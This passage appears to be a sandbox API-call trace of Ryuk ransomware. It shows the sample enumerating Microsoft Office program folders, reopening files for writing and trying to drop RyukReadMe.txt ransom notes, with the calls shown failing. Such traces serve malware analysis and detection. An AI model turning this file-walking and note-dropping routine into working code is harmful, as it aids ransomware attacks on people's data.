dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.818] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.818] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.818] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.818] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.DPV", dwFileAttributes=0x80) returned 0 [0137.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.819] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.819] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.819] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML", dwFileAttributes=0x80) returned 0 [0137.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.820] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WPULQT98.POC", dwFileAttributes=0x80) returned 0 [0137.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WPULQT98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wpulqt98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.821] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.821] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WSIDBR98.POC", dwFileAttributes=0x80) returned 0 [0137.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WSIDBR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wsidbr98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.821] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.822] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.822] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.822] SetLastError (dwErrCode=0x0) [0137.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.825] GetLastError () returned 0x5 [0137.825] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.825] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.825] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.825] SetLastError (dwErrCode=0x0) [0137.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.825] GetLastError () returned 0x5 [0137.825] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.826] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.827] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.827] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Currency Rates.iqy", dwFileAttributes=0x80) returned 0 [0137.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Currency Rates.iqy" (normalized: "c:\\program files\\microsoft office\\office14\\queries\\msn moneycentral investor currency rates.iqy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.828] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.828] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Major Indicies.iqy", dwFileAttributes=0x80) returned 0 [0137.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Major Indicies.iqy" (normalized: "c:\\program files\\microsoft office\\office14\\queries\\msn moneycentral investor major indicies.iqy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.829] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.829] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Stock Quotes.iqy", dwFileAttributes=0x80) returned 0 [0137.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\MSN MoneyCentral Investor Stock Quotes.iqy" (normalized: "c:\\program files\\microsoft office\\office14\\queries\\msn moneycentral investor stock quotes.iqy"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.830] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.830] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.830] SetLastError (dwErrCode=0x0) [0137.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\queries\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.833] GetLastError () returned 0x5 [0137.833] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.833] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.833] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.833] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\REMINDER.WAV", dwFileAttributes=0x80) returned 0 [0137.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\REMINDER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\reminder.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RSWOP.ICM", dwFileAttributes=0x80) returned 0 [0137.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RSWOP.ICM" (normalized: "c:\\program files\\microsoft office\\office14\\rswop.icm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.834] SetLastError (dwErrCode=0x0) [0137.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.834] GetLastError () returned 0x5 [0137.834] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.835] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.835] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.835] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\SOLVSAMP.XLS", dwFileAttributes=0x80) returned 0 [0137.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\SOLVSAMP.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\samples\\solvsamp.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.835] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.835] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.835] SetLastError (dwErrCode=0x0) [0137.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\samples\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.836] GetLastError () returned 0x5 [0137.836] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.836] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.836] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.836] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.836] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SegoeChess.ttf", dwFileAttributes=0x80) returned 0 [0137.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SegoeChess.ttf" (normalized: "c:\\program files\\microsoft office\\office14\\segoechess.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.837] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml", dwFileAttributes=0x80) returned 0 [0137.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.838] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML", dwFileAttributes=0x80) returned 0 [0137.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.839] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.839] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SPANISH.LNG", dwFileAttributes=0x80) returned 0 [0137.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SPANISH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\spanish.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.839] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.840] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SplashScreen.bmp", dwFileAttributes=0x80) returned 0 [0137.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SplashScreen.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.840] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.840] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.840] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.840] GetLastError () returned 0x5 [0137.840] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.841] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.841] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.841] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\STARTUP\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\startup\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.841] GetLastError () returned 0x5 [0137.841] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.841] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.841] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.841] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\subscription.xsd", dwFileAttributes=0x80) returned 0 [0137.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\subscription.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\subscription.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.841] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\THOCR.PSP", dwFileAttributes=0x80) returned 0 [0137.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\THOCR.PSP" (normalized: "c:\\program files\\microsoft office\\office14\\thocr.psp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: 